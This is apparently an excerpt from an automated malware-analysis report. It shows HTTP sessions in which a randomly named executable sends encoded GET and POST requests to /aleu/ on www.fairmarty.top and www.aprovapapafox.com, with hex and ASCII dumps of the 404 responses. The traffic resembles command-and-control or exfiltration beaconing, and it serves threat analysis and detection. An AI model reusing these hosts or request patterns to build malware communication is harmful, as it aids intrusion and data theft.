                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        20192.168.2.449764203.161.46.103804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:22:25.343188047 CEST478OUTGET /aleu/?jn4lNb=1EzsQVnX0vVrGxBbRnBPuNOP8Hn1gSvJWEXTYZCw6Y45y9QSTO9z6ggEQaWzMFMNeg7sTl3Zf11WKrZHAcHpU5xNXvMTIPZOnLFq5OOndh66TdA/sgsdPCY=&jvudu=jXz4lVThP2GL4N HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Host: www.fairmarty.top
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        May 8, 2024 18:22:25.554493904 CEST548INHTTP/1.1 404 Not Found
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:22:25 GMT
                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                        Content-Length: 389
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        21192.168.2.449765162.240.81.18804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:22:40.700539112 CEST748OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        Host: www.aprovapapafox.com
                                                                                                                                                                                                        Origin: http://www.aprovapapafox.com
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        Content-Length: 203
                                                                                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Referer: http://www.aprovapapafox.com/aleu/
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        Data Raw: 6a 6e 34 6c 4e 62 3d 72 47 4a 51 32 49 2b 46 4f 4f 75 6b 7a 6e 76 4b 34 55 6f 6d 4c 2f 51 2b 52 45 32 39 36 4c 31 75 7a 62 34 4b 58 6e 6e 51 59 62 36 38 68 63 76 46 57 71 64 4e 35 67 45 46 31 37 37 38 51 6f 45 4d 6b 55 47 4e 4e 4e 56 6e 41 6a 43 5a 7a 2b 37 6c 70 6b 72 31 57 49 52 72 41 69 75 61 78 4e 39 48 69 4e 57 52 57 68 37 6d 46 59 6a 6b 46 31 74 2f 76 61 39 4e 30 49 4c 64 76 67 7a 6e 7a 67 6a 4f 2b 77 38 49 70 48 72 53 71 2f 50 4a 70 49 59 49 4e 47 41 4e 4a 51 53 66 74 53 52 44 79 2f 4e 33 4e 6a 4e 42 6f 77 43 4c 77 55 6a 32 2b 4b 79 59 75 58 54 65 71 54 37 2f 62 35 61 70 48 47 57 69 78 51 3d 3d
                                                                                                                                                                                                        Data Ascii: jn4lNb=rGJQ2I+FOOukznvK4UomL/Q+RE296L1uzb4KXnnQYb68hcvFWqdN5gEF1778QoEMkUGNNNVnAjCZz+7lpkr1WIRrAiuaxN9HiNWRWh7mFYjkF1t/va9N0ILdvgznzgjO+w8IpHrSq/PJpIYINGANJQSftSRDy/N3NjNBowCLwUj2+KyYuXTeqT7/b5apHGWixQ==
                                                                                                                                                                                                        May 8, 2024 18:22:40.900969982 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:22:40 GMT
                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                        Content-Length: 3650
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        ETag: "636d2d22-e42"
                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                                                                                                                                                                                        May 8, 2024 18:22:40.901010036 CEST1289INData Raw: 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20
                                                                                                                                                                                                        Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                                                                                                                                                                                        May 8, 2024 18:22:40.901026011 CEST1245INData Raw: 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e
                                                                                                                                                                                                        Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        22192.168.2.449766162.240.81.18804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:22:43.424587011 CEST768OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        Host: www.aprovapapafox.com
                                                                                                                                                                                                        Origin: http://www.aprovapapafox.com
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        Content-Length: 223
                                                                                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Referer: http://www.aprovapapafox.com/aleu/
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        Data Raw: 6a 6e 34 6c 4e 62 3d 72 47 4a 51 32 49 2b 46 4f 4f 75 6b 79 45 6e 4b 35 32 41 6d 63 50 51 39 4e 55 32 39 77 72 31 69 7a 62 30 4b 58 6c 4c 41 59 70 65 38 6d 34 72 46 45 75 70 4e 2b 67 45 46 68 4c 37 44 55 6f 45 4c 6b 55 4b 46 4e 4d 5a 6e 41 6a 6d 5a 7a 36 2f 6c 70 54 66 32 51 59 52 31 49 43 75 55 38 74 39 48 69 4e 57 52 57 67 66 4d 46 62 54 6b 43 45 64 2f 75 37 39 4d 31 49 4c 43 75 67 7a 6e 6c 51 6a 4b 2b 77 38 75 70 44 4c 30 71 35 44 4a 70 4a 6f 49 4e 53 30 4b 44 51 53 5a 67 79 51 4b 79 50 34 53 45 57 34 7a 6d 43 71 59 34 55 6d 4c 32 73 6a 43 2f 6d 79 4a 34 54 66 4d 47 2b 54 64 4b 46 72 72 71 61 69 45 64 61 37 59 53 39 33 35 54 6f 33 69 54 39 55 36 73 31 59 3d
                                                                                                                                                                                                        Data Ascii: jn4lNb=rGJQ2I+FOOukyEnK52AmcPQ9NU29wr1izb0KXlLAYpe8m4rFEupN+gEFhL7DUoELkUKFNMZnAjmZz6/lpTf2QYR1ICuU8t9HiNWRWgfMFbTkCEd/u79M1ILCugznlQjK+w8upDL0q5DJpJoINS0KDQSZgyQKyP4SEW4zmCqY4UmL2sjC/myJ4TfMG+TdKFrrqaiEda7YS935To3iT9U6s1Y=
                                                                                                                                                                                                        May 8, 2024 18:22:43.626117945 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:22:43 GMT
                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                        Content-Length: 3650
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        ETag: "636d2d22-e42"
                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                                                                                                                                                                                        May 8, 2024 18:22:43.626131058 CEST1289INData Raw: 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20
                                                                                                                                                                                                        Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                                                                                                                                                                                        May 8, 2024 18:22:43.626147985 CEST1245INData Raw: 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e
                                                                                                                                                                                                        Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        23192.168.2.449767162.240.81.18804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:22:46.160737991 CEST10850OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        Host: www.aprovapapafox.com
                                                                                                                                                                                                        Origin: http://www.aprovapapafox.com
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        Content-Length: 10303
                                                                                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Referer: http://www.aprovapapafox.com/aleu/
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        Data Raw: 6a 6e 34 6c 4e 62 3d 72 47 4a 51 32 49 2b 46 4f 4f 75 6b 79 45 6e 4b 35 32 41 6d 63 50 51 39 4e 55 32 39 77 72 31 69 7a 62 30 4b 58 6c 4c 41 59 70 57 38 68 4c 6a 46 48 4a 31 4e 2f 67 45 46 39 62 37 47 55 6f 46 4f 6b 56 69 42 4e 4d 46 33 41 68 75 5a 79 66 72 6c 34 79 66 32 5a 59 52 31 58 79 75 56 78 4e 39 53 69 4d 36 56 57 68 76 4d 46 62 54 6b 43 47 46 2f 2b 61 39 4d 34 6f 4c 64 76 67 7a 72 7a 67 6a 75 2b 77 6c 62 70 43 4c 37 71 4a 6a 4a 71 70 34 49 41 48 41 4b 50 51 53 62 6c 79 51 53 79 50 6b 42 45 51 64 4b 6d 43 79 32 34 57 36 4c 30 34 79 75 71 45 36 54 6a 31 33 7a 61 63 43 32 4d 32 62 6e 68 6f 69 44 52 5a 6e 6e 49 49 58 35 55 5a 69 38 57 4f 56 35 37 52 6d 39 79 44 7a 72 77 69 49 7a 4b 66 56 7a 6f 6a 6b 58 4d 65 2b 52 31 7a 47 34 71 68 50 63 30 6c 6e 55 4b 59 37 53 70 6d 4a 6c 71 55 73 37 61 55 4d 77 56 79 57 33 46 48 78 6a 46 67 38 71 63 52 72 53 2f 6e 55 74 70 6b 78 4a 59 39 46 53 55 75 73 5a 64 4a 53 4e 4e 4e 6e 50 78 6d 30 37 4e 2b 78 38 38 47 44 67 72 6c 6a 77 7a 42 34 66 57 66 79 52 73 73 56 [TRUNCATED]
                                                                                                                                                                                                        Data Ascii: jn4lNb=rGJQ2I+FOOukyEnK52AmcPQ9NU29wr1izb0KXlLAYpW8hLjFHJ1N/gEF9b7GUoFOkViBNMF3AhuZyfrl4yf2ZYR1XyuVxN9SiM6VWhvMFbTkCGF/+a9M4oLdvgzrzgju+wlbpCL7qJjJqp4IAHAKPQSblyQSyPkBEQdKmCy24W6L04yuqE6Tj13zacC2M2bnhoiDRZnnIIX5UZi8WOV57Rm9yDzrwiIzKfVzojkXMe+R1zG4qhPc0lnUKY7SpmJlqUs7aUMwVyW3FHxjFg8qcRrS/nUtpkxJY9FSUusZdJSNNNnPxm07N+x88GDgrljwzB4fWfyRssVKoX/JaT1IsdMwd26n1cTfechwzKrVHRvvihCZCDJKgaxME5v0hXDahkgm4KDPLfkVafQvNDplH4Bmv4h2LxxgoaNlUUFVorK//rq/3/0bXF/Ar/n6auJUuaui0dLPWA5TOaUqilqTrJos67ZPhaNig2q09zODrS2L2VpK31zNJ8qPRWCHNtTHFvQeW5OF0J68wBs4A+XNSFuOj9TfHbhqfN0NqgN53+yDBPm6WZXC4stDyr5WRb3kPaNGAX5yCYbCY7rZgQ8r2ONUew3W6FL1Un9LvWC1qx3DPMZW2/+3Q3LjFpdjnlmtyma7j1GK9Tn+o1vlqyDK8x8k9tqa/RRuKCx/xcYVLlR1R+OXeg0PufhWVog0hjJWEDqX9cwsOdhtwFpG8oHdCSJeMwrnxoD0SrJqRempNcK8VthVzXKPRdzZ0Ast4HsWaPib1OY2BQGNTLJISkQx3MEx5pyOzjmw+W9hfH9bi6vwwHq2Uy9ZN9YR6raPfZ7o953ipbXN2XHuGU1xKbMtSsa1sf1jtl2BmiXVBj5dJStO2QwsVTPZezDBBln4bw7E1VTZj4K5/zOywjJgR4Sd9YJ9HmJN0ksPTrTg4K4prC5Jy6DZZ0D3iyIw2UB6m37KHBp1m4dxcqbAecl7LyYPgfopaaCL7ySuXpICquWFy9jGE [TRUNCATED]
                                                                                                                                                                                                        May 8, 2024 18:22:46.362932920 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:22:46 GMT
                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                        Content-Length: 3650
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        ETag: "636d2d22-e42"
                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                                                                                                                                                                                        May 8, 2024 18:22:46.363004923 CEST1289INData Raw: 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20
                                                                                                                                                                                                        Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                                                                                                                                                                                        May 8, 2024 18:22:46.363018990 CEST1245INData Raw: 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e
                                                                                                                                                                                                        Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        24192.168.2.449768162.240.81.18804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:22:48.893764973 CEST482OUTGET /aleu/?jn4lNb=mEhw182mTcvL4X7VmCJbLa0KRk630JMb/q8jOnfIToCvkLfDcLYfug01ytzddJhX/lijb8hpDT2F8KzL6RC5Fv1lORSZ/ddJgsC5cmTGFrP+D2MWmLQXjoE=&jvudu=jXz4lVThP2GL4N HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Host: www.aprovapapafox.com
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        May 8, 2024 18:22:49.095360994 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:22:48 GMT
                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                        Content-Length: 3650
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        ETag: "636d2d22-e42"
